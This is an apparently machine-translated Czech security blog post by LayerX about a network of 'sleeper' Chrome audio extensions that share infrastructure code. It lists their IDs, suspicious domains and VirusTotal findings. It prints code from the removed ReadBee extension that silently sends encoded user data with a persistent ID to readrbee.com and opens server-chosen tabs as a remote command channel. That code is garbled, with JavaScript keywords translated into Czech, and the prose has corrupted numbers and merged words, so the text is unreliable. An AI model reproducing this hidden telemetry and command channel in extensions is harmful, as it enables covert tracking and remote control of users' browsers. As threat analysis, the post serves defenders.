Společnost LayerX odhalila síť škodlivých rozšíření „sleeper agent“, která zřejmě slouží jako infrastruktura pro budoucí škodlivé aktivity a která jsou v současné době nainstalována u téměř 1.5 milionu uživatelů po celém světě.
Společnost LayerX objevila síť rozšíření prohlížeče, která zřejmě slouží jako „spící agenti“ pro budoucí škodlivou aktivitu. Všechna rozšíření zřejmě vyvinula stejná osoba nebo skupina, která čeká na svůj „rozkaz“ ke spuštění škodlivého kódu na počítačích nic netušících uživatelů.
Zdá se, že všechna rozšíření, která LayerX identifikoval, se zaměřují na správu zvuku v prohlížeči. Zatímco se rozšíření snaží maskovat své společné parametry (společný kód, společné externí komunikační cíle atd.) a demonstrovat legitimní funkčnost, analýza kódu odhaluje zcela jiný příběh:
- Běžný kód se známými škodlivými rozšířeními: V těchto rozšířeních, která byla dříve identifikována jako škodlivá a odstraněna z Internetového obchodu Chrome, byly nalezeny běžné vzory kódu.
- Načítání externích konfiguračních souborů pro spuštění příkazů: Běžné vzory kódu umožňují rozšíření mimo jiné provádět vzdálené instrukce, aniž by se tyto příkazy objevovaly v kódové základně, čímž se obcházejí tradiční techniky skenování kódu.
- Otevírání karet na pozadí a provádění příkazů: To umožňuje rozšíření provádět příkazy, aniž by o tom uživatel věděl. Příklady takových příkazů mohou být například přístup k externí URL adrese a stahování malwaru.
- Komunikace se známými škodlivými URL adresami: Rozšíření komunikují s externími URL adresami, včetně známých škodlivých domén.
- Šifrování provozuRozšíření také používají šifrování a zmatkování kódu base64 k šifrování externí komunikace a zmatkování jejího chování.
Není třeba dodávat, že se zdá, že tyto funkce nemají žádné legitimní využití ve vztahu k údajné funkci rozšíření.
LayerX v současné době identifikoval čtyři taková rozšíření (podrobnosti viz níže) s více než 1.2 miliony uživatelů po celém světě. LayerX také v současné době prošetřuje několik dalších rozšíření, která se zdají být spojena s touto kampaní. Všechna rozšíření jsou stále k dispozici v Obchodě Chrome.
Běžná, škodlivá kódová základna
I když se rozšíření nezdají být externě propojena, sdílet společnou kódovou základnu s mnoha opakujícími se funkcemi a datovými strukturami, což naznačuje, že za nimi stojí jediný vývojář nebo skupina.
Rozhodující je, že se zdá, že sdílejí kód infrastruktury s rozšířením, které bylo v minulosti z Internetového obchodu Chrome odstraněno kvůli škodlivé aktivitě: ReadBee (ID rozšíření: phjbepamfhjgjdgmbhmfflhnlohldchb) bylo populární rozšíření pro Chrome, které obsahovalo skrytou infrastrukturu pro škodlivou aktivitu. Později bylo z Internetového obchodu Chrome odstraněno poté, co bylo spojováno s přesměrováním provozu a potenciálními podvody s affiliate partnery. Bezpečnostní experti jej označili kvůli podezřelým oprávněním a chování..
Jedno ExtStatTracker třída v ReadBee tiše sleduje instalace, odinstalace a aktualizace odesíláním kódovaných uživatelských dat – včetně trvalého UUID – do readrbee.com. Může také otevírat libovolné URL adresy v nových záložkách, který efektivně funguje jako kanál vzdáleného příkazu. Tato telemetrická logika je zabudována do skriptu na pozadí a je není zveřejněno uživatelům, což potvrzuje přítomnost škodlivé infrastruktury.
Skript na pozadí ReadBee obsahuje komponentu s názvem ExtStatTracker, která funguje jako infrastruktura pro vzdálené ovládání a telemetrii. Kóduje data pomocí btoa a připojuje je k síťovým požadavkům odeslaným do readrbee.comTento systém umožňuje vzdálenému serveru odesílat aktualizace konfigurace a dokonce otevírat libovolné karty pomocí chrome.tabs.create().
Jednou z výhod tohoto nastavení je flexibilita: například ID prvku, které se má sledovat ve skriptu obsahu, lze doručit vzdáleně, čímž se vyhneme pevně zakódované logice a usnadní se obejití statických bezpečnostních nástrojů. Komunikace mezi komponentami probíhá prostřednictvím chrome.storage, což umožňuje trvalou a tichou koordinaci. Tato skrytá infrastruktura vykazuje jasné známky škodlivého úmyslu prostřednictvím tichého sledování, dynamického vkládání chování a úmyslného obcházení bezpečnostních mechanismů.
třída ExtStatTracker {
konstruktérem() {
tento.installUrl = “https://readrbee.com/install/" tento.uninstallUrl = “https://readrbee.com/uninstall/" tento.config = {}, tento.fronta = [], tento.hash = „“, tento.queueProcessorReady = !1, tento.uid = „“, tento.version = chrome.runtime.getManifest().verze, ee = “nedefinované„==“ typof okno ? globalThis : okno, tento.initStorage(), tento.initListenerSlusters()
}
fronta procesů() {
for (; tento.queue.length > 0; ) {
byl t = tento.fronta.posun();
if (!t.typ || "akce" != t.type) zpáteční !0;
byl e = „p=“ + encodeURIComponent(btoa(JSON.zpřísnit({
id: chrome.runtime.id,
v: tento.verze,
akce: t.akce,
uid: tento.uid,
hašiše: tento.hash,
tDatum.teď()
})));
vynést(tento.installUrl + "?" + e).pak((t => t.json()))pak((funkce(t) {
t && 1 != t.ok && (t.url && chrome.tabs.vytvořit({
url: t.url
}), extStatTracker.uložitConfig(t))
}))
}
}
setUninstallUrl() {
byl t = „p=“ + encodeURIComponent(btoa(JSON.stringify({
id: chrome.runtime.id,
v: tento.verze,
akce: „Odinstalovat“,
uid: this.uid,
tDatum.nyní()
})));
chrome.runtime.nastavitUninstallURL(tento.uninstallUrl + "?" + t)
}
initListenerSlusters() {
chrome.runtime.onInstalled.addListener((t => {
tento.fronta.tlačit({
typ: "akce"
akcedůvod
}), tento.queueProcessorReady && tento.fronta procesů()
}))
}
initStorage() {
chrome.storage.local.získat((t => {
t && t.config && (extStatTracker.config = t.config), extStatTracker.config.uid ? extStatTracker.uid = extStatTracker.config.uid : (extStatTracker.uid = extStatTracker.config.uid = crypto.randomUUID(), extStatTracker.uložitConfig()), extStatTracker.hash = extStatTracker.config.hash, extStatTracker.queueProcessorReady = !0, extStatTracker.setUninstallUrl(), extStatTracker.fronta procesů()
}))
}
uložitConfig(t = !1) {
t = t || extStatTracker.config, chrome.storage.local.získat({
config: {}
}, (e => {
Objekt.přiřadit(e.config, t), chrome.storage.local.sada({
config: e.config
})
}))
}
}
const extStatTracker = nový ExtStatTracker;
Tato infrastruktura není unikátní pouze pro ReadBee – podobné struktury škodlivého kódu byly nalezeny i v jiných rozšířeních. Například Hledat ChatGPT prodloužení (acagjkjeebjdmeipgmhcmaddekfmdbaj) používal stejné komunikační a ovládací vzorce a byl z Internetového obchodu Chrome odstraněn dne October 25, 2024 , kvůli malwaru.
Komunikace se škodlivými URL adresami:
Některé domény, se kterými tato rozšíření komunikují, byly na serveru VirusTotal označeny jako známé škodlivé URL adresy:
- https://francjohn[.]com/api/action/
Další doménou, se kterou komunikují rozšíření, je:
- https://jermikro[.]com/api/
Tři z těchto rozšíření komunikují s touto doménou. I když samotná doména nebyla označena jako škodlivá, její podklad byl v minulosti označen pro aktivitu malwaru.
Rozšíření navíc používají v kódu různé šifrovací techniky k šifrování externí komunikace a zamlžování jejího chování.
Zamlžování společného vlastnictví
Dalším klíčovým faktorem je, že ačkoliv se zdá, že všechna rozšíření sdílejí společný kód (alespoň co se týče škodlivých částí), společné téma (všechna se zdají být zaměřena na správu zvuku v prohlížeči) a společnou externí komunikaci, navenek se všechna jeví jako různí vlastníci:
- Každé rozšíření je uvedeno pod jiným vydavatelem s jinými kontaktními údaji.
- Žádné z rozšíření nemá veřejně přístupné webové stránky.
- Kontaktní informace pro každou pobočku vedou k anonymním webmailovým účtům.
V důsledku toho je nemožné zjistit totožnost lidí, kteří za každým z těchto rozšíření stojí.
Podezřelá škodlivá rozšíření:
Níže je uveden aktuální seznam podezřelých škodlivých rozšíření identifikovaných jako součást tohoto kruhu:
| Název rozšíření | ID rozšíření | uživatelé |
| Posilovač zvuku | pmilcmjbofinpnbnpanpdadijibcgifc | 200,000 |
| Prozkoumejte zdrojový kód Volume Max – Ultimate Sound Booster | mgbhdehiapbjamfgekfpebmhmnmcmemg | 1,000,000 |
| Volume Master: Ovládněte svůj zvuk | eoejmjkddfbhhnbmklhccnppogeaeah | 3,000 |
| Zesilovač hlasitosti: Dokonalý zesilovač zvuku | dlcgileladmbfijjmnleehhoebpggpjl | 2,000 |
Další potvrzení o VirusTotal
Ačkoli je VirusTotal známý především jako repozitář pro označování domén/IP adres malwarových velitelských a řídicích serverů (C2), obsahuje také některá data o rozšířeních.
Rozšíření „Examine source code of Volume Max – Ultimate Sound Booster“ s více než milionem stažení již bylo nahlášeno několika dodavateli. Z internetového obchodu Chrome však nebylo odstraněno.
Podobně rozšíření „Sound Boster“ (přes 200,000 XNUMX uživatelů) bylo některými bezpečnostními společnostmi označeno jako škodlivé. I to je stále k dispozici v internetovém obchodě Chrome.
Dopady:
Analýza rozšíření stále probíhá, ale LayerX zatím žádná neidentifikoval. proud škodlivé aktivity (kromě připojení ke známým škodlivým rozšířením). Zdá se, že se jedná o platforma or infrastruktura pro potenciální budoucí škodlivou aktivitu. Proto ji nazýváme „spící“ rozšiřující sítí.
Tento typ „spící“ rozšiřující sítě může sloužit jako náhrada za tradiční botnety. Zatímco budování botnetů (obvykle na exponovaných zařízeních IoT) může být pomalé, technicky složité a těžkopádné, vývoj sítě škodlivých rozšíření prohlížeče je mnohem jednodušší a může poskytnout přímý přístup ke klíčovým informacím o identitě uživatelů, jako jsou soubory cookie, hesla, data prohlížení a prohlížený obsah.
Zde je několik klíčových poznatků:
- I zdánlivě neškodná rozšíření mohou být škodliváV tomto případě, i když jsme nezaznamenali žádné aktivní škodlivé chování, jsme identifikovali několik odkazů na známá škodlivá rozšíření a/nebo domény a kód s funkcemi, které nemají co dělat v rozšířeních s inzerovanými funkcemi.
- Reputace vydavatele je černá díraRozšíření může nahrát kdokoli a je prakticky nemožné vystopovat osoby, které za těmito rozšířeními stojí. V tomto případě, navzdory všem společným rysům, rozšíření vedou zpět na generické webové e-mailové adresy a ne na žádné veřejné webové stránky, a neexistuje způsob, jak zjistit, kdo za nimi stojí.
- Zabezpečení rozšíření je nepřetržitý proces: Není to jednorázové řešení a zdánlivě nevinná rozšíření se mohou stát škodlivými nebo lze škodlivé funkce zapnout/vypnout. Proto je zásadní neustále sledovat hrozby, které rozšíření vašeho prohlížeče představují, a bezpečnostní stav.
